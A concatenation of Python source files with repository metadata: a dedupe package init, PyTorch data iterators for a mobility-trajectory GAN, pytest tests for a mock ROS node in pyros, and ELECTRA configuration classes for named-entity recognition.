| 80.347976 | 608 | 0.5953 | 9,229 | 93,284 | 6.009644 | 0.067938 | 0.0119 | 0.011107 | 0.009195 | 0.892541 | 0.88138 | 0.871067 | 0.862287 | 0.858086 | 0.853993 | 0 | 0.009417 | 0.326101 | 93,284 | 1,160 | 609 | 80.417241 | 0.872853 | 0.885007 | 0 | 0.344828 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.344828 | false | 0.344828 | 0.275862 | 0 | 0.655172 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 10 |
c623fbd6b00226f151575c1366476edcd8f2c2a7 | 242 | py | Python | dedupe/_init.py | eig-2017/dedupe | 7f90bcbbf345534b8692df726e9ba2479856bba1 | [
"MIT"
] | null | null | null | dedupe/_init.py | eig-2017/dedupe | 7f90bcbbf345534b8692df726e9ba2479856bba1 | [
"MIT"
] | null | null | null | dedupe/_init.py | eig-2017/dedupe | 7f90bcbbf345534b8692df726e9ba2479856bba1 | [
"MIT"
] | null | null | null | from dedupe.api import StaticDedupe, Dedupe
from dedupe.api import StaticRecordLink, RecordLink
from dedupe.api import StaticGazetteer, Gazetteer
from dedupe.convenience import consoleLabel, trainingDataDedupe, trainingDataLink, canonicalize
| 48.4 | 95 | 0.867769 | 26 | 242 | 8.076923 | 0.538462 | 0.190476 | 0.185714 | 0.271429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 242 | 4 | 96 | 60.5 | 0.954545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c6275cf6dd621e864fa3063fd98a94407da1b7ed | 10,176 | py | Python | MoveSim/code/data_iter.py | tobinsouth/privacy-preserving-synthetic-mobility-data | fd4d1851b47e3e7304761a894b460e8345fae5db | [
"MIT"
] | null | null | null | MoveSim/code/data_iter.py | tobinsouth/privacy-preserving-synthetic-mobility-data | fd4d1851b47e3e7304761a894b460e8345fae5db | [
"MIT"
] | null | null | null | MoveSim/code/data_iter.py | tobinsouth/privacy-preserving-synthetic-mobility-data | fd4d1851b47e3e7304761a894b460e8345fae5db | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
import os
import pdb
import random
import math
import numpy as np
import torch
class GenDataIter(object):
""" Toy data iter to load digits"""
def __init__(self, data_file, batch_size):
super(GenDataIter, self).__init__()
self.batch_size = batch_size
self.data_lis = self.read_file(data_file)
self.data_num = len(self.data_lis)
self.indices = range(self.data_num)
self.num_batches = int(
math.ceil(float(self.data_num) / self.batch_size))
self.idx = 0
def __len__(self):
return self.num_batches
def __iter__(self):
return self
def __next__(self):
return self.next()
def reset(self):
self.idx = 0
random.shuffle(self.data_lis)
def next(self):
if self.idx >= self.data_num - self.batch_size:
raise StopIteration
index = self.indices[self.idx:self.idx + self.batch_size]
d = [self.data_lis[i] for i in index]
d = torch.LongTensor(np.asarray(d, dtype='int64'))
data = torch.cat([torch.zeros(self.batch_size, 1).long(), d], dim=1)
target = torch.cat([d, torch.zeros(self.batch_size, 1).long()], dim=1)
self.idx += self.batch_size
return data, target
def read_file(self, data_file):
with open(data_file, 'r') as f:
lines = f.readlines()
lis = []
for line in lines:
l = line.strip().split(' ')
l = [int(s) for s in l]
lis.append(l)
return lis
class NewGenIter(object):
""" Toy data iter to load digits"""
def __init__(self, data_file, batch_size):
super(NewGenIter, self).__init__()
self.batch_size = batch_size
self.data_lis = self.read_file(data_file)
self.data_num = len(self.data_lis)
self.indices = range(self.data_num)
self.num_batches = int(
math.ceil(float(self.data_num) / self.batch_size))
self.idx = 0
def __len__(self):
return self.num_batches
def __iter__(self):
return self
def __next__(self):
return self.next()
def reset(self):
self.idx = 0
random.shuffle(self.data_lis)
def next(self):
if self.idx >= self.data_num - self.batch_size:
raise StopIteration
index = self.indices[self.idx:self.idx + self.batch_size]
d = [self.data_lis[i] for i in index]
d = np.asarray(d, dtype='int64')
data = torch.LongTensor(d[:, :-1])
target = torch.LongTensor(d[:, 1:])
self.idx += self.batch_size
return data, target
def read_file(self, data_file):
with open(data_file, 'r') as f:
lines = f.readlines()
lis = []
for line in lines:
l = line.strip().split(' ')
l = [int(s) for s in l]
lis.append(l)
return lis
class DisDataIter(object):
""" Toy data iter to load digits"""
def __init__(self, real_data_file, fake_data_file, batch_size,length):
super(DisDataIter, self).__init__()
self.batch_size = batch_size
real_data_lis = self.read_file(real_data_file)
t2 = real_data_lis
print(len(t2[0]), "length of t2, ", length, "length")
if len(t2[0])!=length:
if length == 24:
t3 = [t[0:24] for t in t2]
elif length==72:
t3 = []
for t in t2:
t.extend(t[0:24])
t3.append(t)
elif length==96:
t3 = []
for t in t2:
t.extend(t)
t3.append(t)
elif length==120:
t3 = []
for t in t2:
t.extend(t)
t.extend(t[0:24])
t3.append(t)
elif length==168:
t3 = []
for t in t2:
t.extend(t)
t.extend(t[0:48])
t.extend(t[0:24])
t3.append(t)
real_data_lis = t3
fake_data_lis = self.read_file(fake_data_file)
t2 = fake_data_lis
if len(t2[0])!=length:
if length == 24:
t3 = [t[0:24] for t in t2]
elif length==72:
t3 = []
for t in t2:
t.extend(t[0:24])
t3.append(t)
elif length==96:
t3 = []
for t in t2:
t.extend(t)
t3.append(t)
elif length==120:
t3 = []
for t in t2:
t.extend(t)
t.extend(t[0:24])
t3.append(t)
elif length==168:
t3 = []
for t in t2:
t.extend(t)
t.extend(t[0:48])
t.extend(t[0:24])
t3.append(t)
fake_data_lis = t3
self.data = real_data_lis + fake_data_lis
self.labels = [1 for _ in range(len(real_data_lis))] + \
[0 for _ in range(len(fake_data_lis))]
self.pairs = list(zip(self.data, self.labels))
self.data_num = len(self.pairs)
self.indices = range(self.data_num)
self.num_batches = int(
math.ceil(float(self.data_num) / self.batch_size))
self.idx = 0
def __len__(self):
return self.num_batches
def __iter__(self):
return self
def __next__(self):
return self.next()
def reset(self):
self.idx = 0
random.shuffle(self.pairs)
def next(self):
if self.idx >= self.data_num - self.batch_size:
raise StopIteration
index = self.indices[self.idx:self.idx + self.batch_size]
pairs = [self.pairs[i] for i in index]
data = [p[0] for p in pairs]
label = [p[1] for p in pairs]
data = torch.LongTensor(np.asarray(data, dtype='int64'))
label = torch.LongTensor(np.asarray(label, dtype='int64'))
self.idx += self.batch_size
return data, label
def read_file(self, data_file):
with open(data_file, 'r') as f:
lines = f.readlines()
lis = []
for line in lines:
l = line.strip().split(' ')
l = [int(s) for s in l]
lis.append(l)
return lis
class TCGenDataIter(object):
"""data iterator with time context.
"""
def __init__(self, data_file, batch_size):
super(TCGenDataIter, self).__init__()
self.batch_size = batch_size
self.data_lis = self.read_file(data_file)
self.data_num = len(self.data_lis)
self.indices = range(self.data_num)
self.num_batches = int(
math.ceil(float(self.data_num) / self.batch_size))
self.idx = 0
time_list = [23] + [i % 24 for i in range(48)]
self.time = torch.stack(
[torch.ones(self.batch_size) * i for i in time_list], dim=1).long()
def __len__(self):
return self.num_batches
def __iter__(self):
return self
def __next__(self):
return self.next()
def reset(self):
self.idx = 0
random.shuffle(self.data_lis)
def next(self):
if self.idx >= self.data_num - self.batch_size:
raise StopIteration
index = self.indices[self.idx:self.idx + self.batch_size]
d = [self.data_lis[i] for i in index]
d = torch.LongTensor(np.asarray(d, dtype='int64'))
data = torch.cat([torch.zeros(self.batch_size, 1).long(), d], dim=1)
target = torch.cat([d, torch.zeros(self.batch_size, 1).long()], dim=1)
self.idx += self.batch_size
return self.time, data, target
def read_file(self, data_file):
with open(data_file, 'r') as f:
lines = f.readlines()
lis = []
for line in lines:
l = line.strip().split(' ')
l = [int(s) for s in l]
lis.append(l)
return lis
class TCDisDataIter(object):
""" Toy data iter to load digits"""
def __init__(self, real_data_file, fake_data_file, batch_size):
super(TCDisDataIter, self).__init__()
self.batch_size = batch_size
real_data_lis = self.read_file(real_data_file)
fake_data_lis = self.read_file(fake_data_file)
self.data = real_data_lis + fake_data_lis
self.labels = [1 for _ in range(len(real_data_lis))] + \
[0 for _ in range(len(fake_data_lis))]
self.pairs = list(zip(self.data, self.labels))
self.data_num = len(self.pairs)
self.indices = range(self.data_num)
self.num_batches = int(
math.ceil(float(self.data_num) / self.batch_size))
self.idx = 0
time_list = [i % 24 for i in range(48)]
self.time = torch.stack(
[torch.ones(self.batch_size) * i for i in time_list], dim=1).long()
def __len__(self):
return self.num_batches
def __iter__(self):
return self
def __next__(self):
return self.next()
def reset(self):
self.idx = 0
random.shuffle(self.pairs)
def next(self):
if self.idx >= self.data_num - self.batch_size:
raise StopIteration
index = self.indices[self.idx:self.idx + self.batch_size]
pairs = [self.pairs[i] for i in index]
data = [p[0] for p in pairs]
label = [p[1] for p in pairs]
data = torch.LongTensor(np.asarray(data, dtype='int64'))
label = torch.LongTensor(np.asarray(label, dtype='int64'))
self.idx += self.batch_size
return self.time, data, label
def read_file(self, data_file):
with open(data_file, 'r') as f:
lines = f.readlines()
lis = []
for line in lines:
l = line.strip().split(' ')
l = [int(s) for s in l]
lis.append(l)
return lis
| 31.02439 | 79 | 0.527123 | 1,358 | 10,176 | 3.753314 | 0.078056 | 0.06906 | 0.079066 | 0.044144 | 0.929174 | 0.928193 | 0.928193 | 0.922503 | 0.916029 | 0.899156 | 0 | 0.022564 | 0.355444 | 10,176 | 327 | 80 | 31.119266 | 0.754536 | 0.017197 | 0 | 0.885609 | 0 | 0 | 0.006519 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.129151 | false | 0 | 0.02214 | 0.055351 | 0.261993 | 0.00369 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d67f398056cf2b976289695f3a1a782d6ffa329e | 189 | py | Python | pyconsole/input/input.py | Deployeur/PyConsole | e97cb7baf0da23826ad31cf99f28ae2e6a21d73e | [
"MIT"
] | 1 | 2018-10-04T12:11:46.000Z | 2018-10-04T12:11:46.000Z | pyconsole/input/input.py | GentianSadiku/PyConsole | e97cb7baf0da23826ad31cf99f28ae2e6a21d73e | [
"MIT"
] | null | null | null | pyconsole/input/input.py | GentianSadiku/PyConsole | e97cb7baf0da23826ad31cf99f28ae2e6a21d73e | [
"MIT"
] | null | null | null | class Input:
def __init__(self, args={}):
self.args = args
def add(self, key, value):
self.args[key] = value
def get(self, key):
return self.args[key]
| 18.9 | 32 | 0.555556 | 26 | 189 | 3.884615 | 0.423077 | 0.316832 | 0.217822 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.306878 | 189 | 9 | 33 | 21 | 0.770992 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.428571 | false | 0 | 0 | 0.142857 | 0.714286 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
d6e4179f81195aaa169022d61b9e3b6b415d38d8 | 19,792 | py | Python | tests/test_pyros_interfaces_mock/test_pyros_mock.py | pyros-dev/pyros-common | 0709538b8777ec055ea31f59cdca5bebaaabb04e | [
"MIT"
] | null | null | null | tests/test_pyros_interfaces_mock/test_pyros_mock.py | pyros-dev/pyros-common | 0709538b8777ec055ea31f59cdca5bebaaabb04e | [
"MIT"
] | 61 | 2018-04-06T08:56:23.000Z | 2019-05-20T19:01:19.000Z | tests/test_pyros_interfaces_mock/test_pyros_mock.py | asmodehn/pyros-common | 0709538b8777ec055ea31f59cdca5bebaaabb04e | [
"MIT"
] | null | null | null | from __future__ import absolute_import
from __future__ import print_function
import os
import sys
# This is needed if running this test directly (without using nose loader)
# prepending because ROS relies on package dirs list in PYTHONPATH and not isolated virtualenvs
# And we need our current module to be found first.
current_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..'))
# if not current_path in sys.path:
sys.path.insert(1, current_path) # sys.path[0] is always current path as per python spec
import time
from pyros_interfaces_mock.mocksystem import (
mock_publisher_remote, mock_subscriber_remote, topics_available_remote, topics_available_type_remote,
)
from pyros_interfaces_mock import PyrosMock, statusecho_topic
import pyzmp
import pytest
### TESTING NODE CREATION / TERMINATION ###
@pytest.mark.timeout(5)
def test_mocknode_creation_termination():
mockn = PyrosMock()
assert not mockn.is_alive()
mockn.start()
try:
assert mockn.is_alive()
finally:
mockn.shutdown()
assert not mockn.is_alive()
@pytest.mark.timeout(5)
def test_mocknode_provide_services(): # Here we check that this node actually provides all the services
mockn = PyrosMock()
assert not mockn.is_alive()
assert hasattr(mockn, 'msg_build')
assert hasattr(mockn, 'topic')
assert hasattr(mockn, 'topics')
assert hasattr(mockn, 'service')
assert hasattr(mockn, 'services')
assert hasattr(mockn, 'param')
assert hasattr(mockn, 'params')
assert hasattr(mockn, 'setup')
mockn.start()
try:
assert mockn.is_alive()
print("Discovering msg_build Service...")
msg_build = pyzmp.discover("msg_build", 5) # we wait a bit to let it time to start
assert msg_build is not None
assert len(msg_build.providers) == 1
print("Discovering topic Service...")
topic = pyzmp.discover("topic", 5) # we wait a bit to let it time to start
assert topic is not None
assert len(topic.providers) == 1
print("Discovering topics Service...")
topic_list = pyzmp.discover("topics", 5) # we wait a bit to let it time to start
assert topic_list is not None
assert len(topic_list.providers) == 1
print("Discovering service Service...")
service = pyzmp.discover("service", 5) # we wait a bit to let it time to start
assert service is not None
assert len(service.providers) == 1
print("Discovering services Service...")
service_list = pyzmp.discover("services", 5) # we wait a bit to let it time to start
assert service_list is not None
assert len(service_list.providers) == 1
print("Discovering param Service...")
param = pyzmp.discover("param", 5) # we wait a bit to let it time to start
assert param is not None
assert len(param.providers) == 1
print("Discovering params Service...")
param_list = pyzmp.discover("params", 5) # we wait a bit to let it time to start
assert param_list is not None
assert len(param_list.providers) == 1
print("Discovering setup Service...")
param_list = pyzmp.discover("setup", 5) # we wait a bit to let it time to start
assert param_list is not None
assert len(param_list.providers) == 1
finally:
mockn.shutdown()
assert not mockn.is_alive()
#TODO change it
@pytest.mark.timeout(6000000)
def test_mocknode_publishers_detect(): # Here we check that this node actually detects a topic
mockn = PyrosMock(kwargs={
'services': [],
'publishers': ['test_topic'],
'subscribers': [],
'params': []
})
assert not mockn.is_alive()
assert hasattr(mockn, 'topics')
# starting the node
mockn.start()
# checking interface is still None here ( instantiated in child only )
assert mockn.interface is None
# Services are initialized in run() method of pyzmp.Node, after interface has been initialized
try:
assert mockn.is_alive()
with mock_publisher_remote('test_topic', statusecho_topic):
# asserting the mock system has done its job from our point of view at least
assert 'test_topic' in topics_available_remote
assert topics_available_type_remote['test_topic'] == statusecho_topic
# Getting topics list from child process
print("Discovering topics Service...")
topics = pyzmp.discover("topics", 3) # we wait a bit to let it time to start
assert topics is not None
assert len(topics.providers) == 1
time.sleep(mockn.update_interval + 1) # make sure we let update time to kick in
# TODO : change timeout
res = topics.call(recv_timeout=6000000)
# the mock system should have done its job from the other process perspective too
# via multiprocess manager list
assert 'test_topic' in res # topic detected since in list of exposed topics
finally:
mockn.shutdown()
assert not mockn.is_alive()
#TODO change it
@pytest.mark.timeout(6000000)
def test_mocknode_publishers_configure_detect(): # Here we check that this node actually detects a topic
mockn = PyrosMock()
mockn.configure({
'SERVICES': [],
'PUBLISHERS': ['test_topic'],
'SUBSCRIBERS': [],
'PARAMS': []
})
assert not mockn.is_alive()
assert hasattr(mockn, 'topics')
# starting the node
mockn.start()
# checking interface is still None here ( instantiated in child only )
assert mockn.interface is None
# Services are initialized in run() method of pyzmp.Node, after interface has been initialized
try:
assert mockn.is_alive()
with mock_publisher_remote('test_topic', statusecho_topic):
# asserting the mock system has done its job from our point of view at least
assert 'test_topic' in topics_available_remote
assert topics_available_type_remote['test_topic'] == statusecho_topic
# Getting topics list from child process
print("Discovering topics Service...")
topics = pyzmp.discover("topics", 3) # we wait a bit to let it time to start
assert topics is not None
assert len(topics.providers) == 1
time.sleep(mockn.update_interval + 1) # make sure we let update time to kick in
# TODO : change timeout
res = topics.call(recv_timeout=6000000)
# the mock system should have done its job from the other process perspective too
# via multiprocess manager list
assert 'test_topic' in res # topic detected since in list of exposed topics
finally:
mockn.shutdown()
assert not mockn.is_alive()
#TODO change it
@pytest.mark.timeout(6000000)
def test_mocknode_publishers_detect_setup(): # Here we check that this node actually detects a topic upon setup
mockn = PyrosMock()
assert not mockn.is_alive()
assert hasattr(mockn, 'topics')
mockn.start()
try:
assert mockn.is_alive()
with mock_publisher_remote('test_topic', statusecho_topic):
print("Discovering topics Service...")
topics = pyzmp.discover("topics", 3) # we wait a bit to let it time to start
assert topics is not None
assert len(topics.providers) == 1
res = topics.call()
assert not 'test_topic' in res # topic not detected since not in list of exposed topics
print("Discovering setup Service...")
setup = pyzmp.discover("setup", 3) # we wait a bit to let it time to start
assert setup is not None
assert len(setup.providers) == 1
setup.call(kwargs={'services': [], 'topics': ['test_topic'], 'params': []})
time.sleep(mockn.update_interval + 1) # waiting for update to kick in
res = topics.call()
assert 'test_topic' in res
finally:
mockn.shutdown()
assert not mockn.is_alive()
#TODO change it
@pytest.mark.timeout(6000000)
def test_mocknode_publishers_detect_throttled():
"""
Testing that the mocknode detection of topics is throttled properly
:return:
"""
mockn = PyrosMock()
assert not mockn.is_alive()
assert hasattr(mockn, 'topics')
mockn.update_interval = 5 # we wait 5 seconds between each update_throttled call
mockn.start() # one update will be triggered, and then nothing for the next 10 seconds
try:
assert mockn.is_alive()
print("Discovering setup Service...")
setup = pyzmp.discover("setup", 3) # we wait a bit to let it time to start
assert setup is not None
assert len(setup.providers) == 1
setup.call(kwargs={'services': [], 'topics': ['test_topic'], 'params': []})
with mock_publisher_remote('test_topic', statusecho_topic):
print("Discovering topics Service...")
topics = pyzmp.discover("topics", 3) # we wait a bit to let it time to start
assert topics is not None
assert len(topics.providers) == 1
# topic is very likely not detected yet ( we didn't wait after creating and exposing it )
res = topics.call()
assert not 'test_topic' in res
time.sleep(mockn.update_interval + 1) # make sure we let update time to kick in
# topic has to be detected now
res = topics.call()
assert 'test_topic' in res
finally: # to make sure we clean up on failure
mockn.shutdown()
assert not mockn.is_alive()
#TODO change it
@pytest.mark.timeout(6000000)
def test_mocknode_subscribers_detect(): # Here we check that this node actually detects a topic
mockn = PyrosMock(kwargs={
'services': [],
'publishers': [],
'subscribers': ['test_topic'],
'params': []
})
assert not mockn.is_alive()
assert hasattr(mockn, 'topics')
# starting the node
mockn.start()
# checking interface is still None here ( instantiated in child only )
assert mockn.interface is None
# Services are initialized in run() method of pyzmp.Node, after interface has been initialized
try:
assert mockn.is_alive()
with mock_subscriber_remote('test_topic', statusecho_topic):
# asserting the mock system has done its job from our point of view at least
assert 'test_topic' in topics_available_remote
assert topics_available_type_remote['test_topic'] == statusecho_topic
# Getting topics list from child process
print("Discovering topics Service...")
topics = pyzmp.discover("topics", 3) # we wait a bit to let it time to start
assert topics is not None
assert len(topics.providers) == 1
time.sleep(mockn.update_interval + 1) # make sure we let update time to kick in
res = topics.call(recv_timeout=6000000)
# the mock system should have done its job from the other process perspective too
# via multiprocess manager list
assert 'test_topic' in res # topic detected since in list of exposed topics
finally:
mockn.shutdown()
assert not mockn.is_alive()
#TODO change it
@pytest.mark.timeout(6000000)
def test_mocknode_subscribers_configure_detect(): # Here we check that this node actually detects a topic
mockn = PyrosMock()
mockn.configure({
'SERVICES': [],
'PUBLISHERS': [],
'SUBSCRIBERS': ['test_topic'],
'PARAMS': []
})
assert not mockn.is_alive()
assert hasattr(mockn, 'topics')
# starting the node
mockn.start()
# checking interface is still None here ( instantiated in child only )
assert mockn.interface is None
# Services are initialized in run() method of pyzmp.Node, after interface has been initialized
try:
assert mockn.is_alive()
with mock_subscriber_remote('test_topic', statusecho_topic):
# asserting the mock system has done its job from our point of view at least
assert 'test_topic' in topics_available_remote
assert topics_available_type_remote['test_topic'] == statusecho_topic
# Getting topics list from child process
print("Discovering topics Service...")
topics = pyzmp.discover("topics", 3) # we wait a bit to let it time to start
assert topics is not None
assert len(topics.providers) == 1
time.sleep(mockn.update_interval + 1) # make sure we let update time to kick in
res = topics.call(recv_timeout=6000000)
# the mock system should have done its job from the other process perspective too
# via multiprocess manager list
assert 'test_topic' in res # topic detected since in list of exposed topics
finally:
mockn.shutdown()
assert not mockn.is_alive()
#TODO change it
@pytest.mark.timeout(6000000)
def test_mocknode_subscribers_detect_setup(): # Here we check that this node actually detects a topic upon setup
mockn = PyrosMock()
assert not mockn.is_alive()
assert hasattr(mockn, 'topics')
mockn.start()
try:
assert mockn.is_alive()
with mock_subscriber_remote('test_topic', statusecho_topic):
print("Discovering topics Service...")
topics = pyzmp.discover("topics", 3) # we wait a bit to let it time to start
assert topics is not None
assert len(topics.providers) == 1
res = topics.call()
assert not 'test_topic' in res # topic not detected since not in list of exposed topics
print("Discovering setup Service...")
setup = pyzmp.discover("setup", 3) # we wait a bit to let it time to start
assert setup is not None
assert len(setup.providers) == 1
setup.call(kwargs={'services': [], 'topics': ['test_topic'], 'params': []})
time.sleep(mockn.update_interval + 1) # waiting for update to kick in
res = topics.call()
assert 'test_topic' in res
finally:
mockn.shutdown()
assert not mockn.is_alive()
#TODO change it
@pytest.mark.timeout(6000000)
def test_mocknode_subscribers_detect_throttled():
"""
Testing that the mocknode detection of topics is throttled properly
:return:
"""
mockn = PyrosMock()
assert not mockn.is_alive()
assert hasattr(mockn, 'topics')
mockn.update_interval = 5 # we wait 5 seconds between each update_throttled call
mockn.start() # one update will be triggered, and then nothing for the next 10 seconds
try:
assert mockn.is_alive()
print("Discovering setup Service...")
setup = pyzmp.discover("setup", 3) # we wait a bit to let it time to start
assert setup is not None
assert len(setup.providers) == 1
setup.call(kwargs={'services': [], 'topics': ['test_topic'], 'params': []})
with mock_subscriber_remote('test_topic', statusecho_topic):
print("Discovering topics Service...")
topics = pyzmp.discover("topics", 3) # we wait a bit to let it time to start
assert topics is not None
assert len(topics.providers) == 1
# topic is very likely not detected yet ( we didn't wait after creating and exposing it )
res = topics.call()
assert not 'test_topic' in res
time.sleep(mockn.update_interval + 1) # make sure we let update time to kick in
# topic has to be detected now
res = topics.call()
assert 'test_topic' in res
finally: # to make sure we clean up on failure
mockn.shutdown()
assert not mockn.is_alive()
def test_msg_build():
msg = PyrosMock().msg_build('fake_connec_name')
print("msg is of type {0}".format(type(msg)))
assert isinstance(msg, str)
def test_echo_topic_default():
mock = PyrosMock()
recv_msg = mock.topic('random_topic')
assert recv_msg is None
def test_echo_same_topic():
msg = 'testing'
mock = PyrosMock()
mock.topic('random_topic', msg)
print("msg sent is {0}".format(msg))
recv_msg = mock.topic('random_topic')
print("msg received is {0}".format(recv_msg))
assert msg == recv_msg
def test_other_topic():
msg = 'testing'
mock = PyrosMock()
mock.topic('random_topic', msg)
print("msg sent is {0}".format(msg))
recv_msg = mock.topic('random_topic_2')
print("msg received is {0}".format(recv_msg))
assert recv_msg is None
def test_echo_service_default():
msg = 'testing'
mock = PyrosMock()
assert mock.service('random_service') is None
def test_echo_service():
msg = 'testing'
mock = PyrosMock()
print("msg sent is {0}".format(msg))
recv_msg = mock.service('random_service', msg)
print("msg received is {0}".format(recv_msg))
assert msg == recv_msg
class TestPyrosMockProcess(object):
mockInstance = None
@classmethod
def setup_class(cls):
cls.mockInstance = PyrosMock()
assert cls.mockInstance.start()
@classmethod
def teardown_class(cls):
cls.mockInstance.shutdown()
def test_msg_build(self):
msg_build_svc = pyzmp.Service.discover('msg_build', 5)
assert(msg_build_svc is not None)
assert(self.mockInstance not in msg_build_svc.providers)
resp = msg_build_svc.call(args=('fake_connec_name',))
assert isinstance(resp, str)
def test_list_topic(self):
list_topic_svc = pyzmp.Service.discover('topics', 5)
assert(list_topic_svc is not None)
assert(self.mockInstance not in list_topic_svc.providers)
resp = list_topic_svc.call()
assert resp is not None
def test_echo_topic(self):
topic_svc = pyzmp.Service.discover('topic', 5)
assert(topic_svc is not None)
assert(self.mockInstance not in topic_svc.providers)
resp = topic_svc.call(args=('random_topic', 'testing'))
assert resp is None # message consumed
resp = topic_svc.call(args=('random_topic', None))
assert resp == 'testing' # message echoed
def test_other_topic(self):
topic_svc = pyzmp.Service.discover('topic', 5)
assert(topic_svc is not None)
assert(self.mockInstance not in topic_svc.providers)
resp = topic_svc.call(args=('random_topic', 'testing'))
assert resp is None # message consumed
resp = topic_svc.call(args=('random_topic_2', None))
assert resp is None # message not echoed
def test_list_service(self):
service_svc = pyzmp.Service.discover('services', 5)
assert(service_svc is not None)
assert(self.mockInstance not in service_svc.providers)
resp = service_svc.call()
assert resp is not None # message echoed
def test_echo_service(self):
service_svc = pyzmp.Service.discover('service', 5)
assert(service_svc is not None)
assert(self.mockInstance not in service_svc.providers)
resp = service_svc.call(args=('random_service', 'testing'))
assert resp == 'testing' # message echoed
#TODO Check that if a service is called inappropriately, the exception is properly transferred back to the calling process and reraised.
# Just in case we run this directly
if __name__ == '__main__':
import pytest
pytest.main([
'-s', __file__,
])
| 34.242215 | 140 | 0.647383 | 2,592 | 19,792 | 4.819444 | 0.091049 | 0.025937 | 0.028818 | 0.03122 | 0.823007 | 0.801953 | 0.787144 | 0.760167 | 0.752562 | 0.746398 | 0 | 0.010912 | 0.263793 | 19,792 | 577 | 141 | 34.30156 | 0.846407 | 0.245352 | 0 | 0.716931 | 0 | 0 | 0.121704 | 0 | 0 | 0 | 0 | 0.005199 | 0.362434 | 1 | 0.063492 | false | 0 | 0.026455 | 0 | 0.095238 | 0.074074 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ba44134aeeb374b56b323365981c571a139bc017 | 14,611 | py | Python | configs/WNUT_MRC_configs.py | JRC1995/SocialMediaNER | 236b22ded48f64516ebf0577c3b9d9d907db84e0 | [
"MIT"
] | null | null | null | configs/WNUT_MRC_configs.py | JRC1995/SocialMediaNER | 236b22ded48f64516ebf0577c3b9d9d907db84e0 | [
"MIT"
] | null | null | null | configs/WNUT_MRC_configs.py | JRC1995/SocialMediaNER | 236b22ded48f64516ebf0577c3b9d9d907db84e0 | [
"MIT"
] | null | null | null | class ELECTRA_MRC_config:
def __init__(self):
# basic embedding config
self.embedding_path = 'embeddings/ELECTRA/'
self.BigTransformerDim = 1024
self.layer_num = 24
self.pool_type = 'mean'
# layer aggregation / layer selection config
self.aggregate_layers = True
self.aggregate_num = 12
self.select_a_particular_layer = False
self.select_num = 18
# BiLSTM config
self.use_BiLSTM = False
self.BiLSTM_input_dropconnect = 0.0
self.BiLSTM_hidden_dropconnect = 0.0
self.BiLSTM_zoneout = 0.0
self.word_dropout = 0.05
self.hidden_size = 256
self.BiLSTM_in_dropout = 0.5
self.BiLSTM_out_dropout = 0.5
# loss config
self.use_CRF = False
self.use_sequence_label = False
self.use_DSC = False
# fine tune/ embd training
self.fine_tune_style = True
# optimizer_settings
self.fine_tune_lr = 2e-5
self.lr = 1e-3
self.wd = 1e-3
self.use_gc = True # gradient centralization
# training settings
self.total_batch_size = 32
self.train_batch_size = 16
self.val_batch_size = 16
self.early_stop_patience = 3
self.max_grad_norm = 5
self.epochs = 100
self.model_name = '(ELECTRA-MRC)'
class ELECTRA_DSC_MRC_config:
def __init__(self):
# basic embedding config
self.embedding_path = 'embeddings/ELECTRA/'
self.BigTransformerDim = 1024
self.layer_num = 24
self.pool_type = 'mean'
# layer aggregation / layer selection config
self.aggregate_layers = True
self.aggregate_num = 12
self.select_a_particular_layer = False
self.select_num = 18
# BiLSTM config
self.use_BiLSTM = False
self.BiLSTM_input_dropconnect = 0.0
self.BiLSTM_hidden_dropconnect = 0.0
self.BiLSTM_zoneout = 0.0
self.word_dropout = 0.05
self.hidden_size = 256
self.BiLSTM_in_dropout = 0.5
self.BiLSTM_out_dropout = 0.5
# loss config
self.use_CRF = False
self.use_sequence_label = False
self.use_DSC = True
# fine tune/ embd training
self.fine_tune_style = True
# optimizer_settings
self.fine_tune_lr = 2e-5
self.lr = 1e-3
self.wd = 1e-3
self.use_gc = True # gradient centralization
# training settings
self.total_batch_size = 32
self.train_batch_size = 8
self.val_batch_size = 8
self.early_stop_patience = 3
self.max_grad_norm = 5
self.epochs = 100
self.model_name = '(ELECTRA-DSC-MRC)'
class ELECTRA_SL_MRC_config:
def __init__(self):
# basic embedding config
self.embedding_path = 'embeddings/ELECTRA/'
self.BigTransformerDim = 1024
self.layer_num = 24
self.pool_type = 'mean'
# layer aggregation / layer selection config
self.aggregate_layers = True
self.aggregate_num = 12
self.select_a_particular_layer = False
self.select_num = 18
# BiLSTM config
self.use_BiLSTM = False
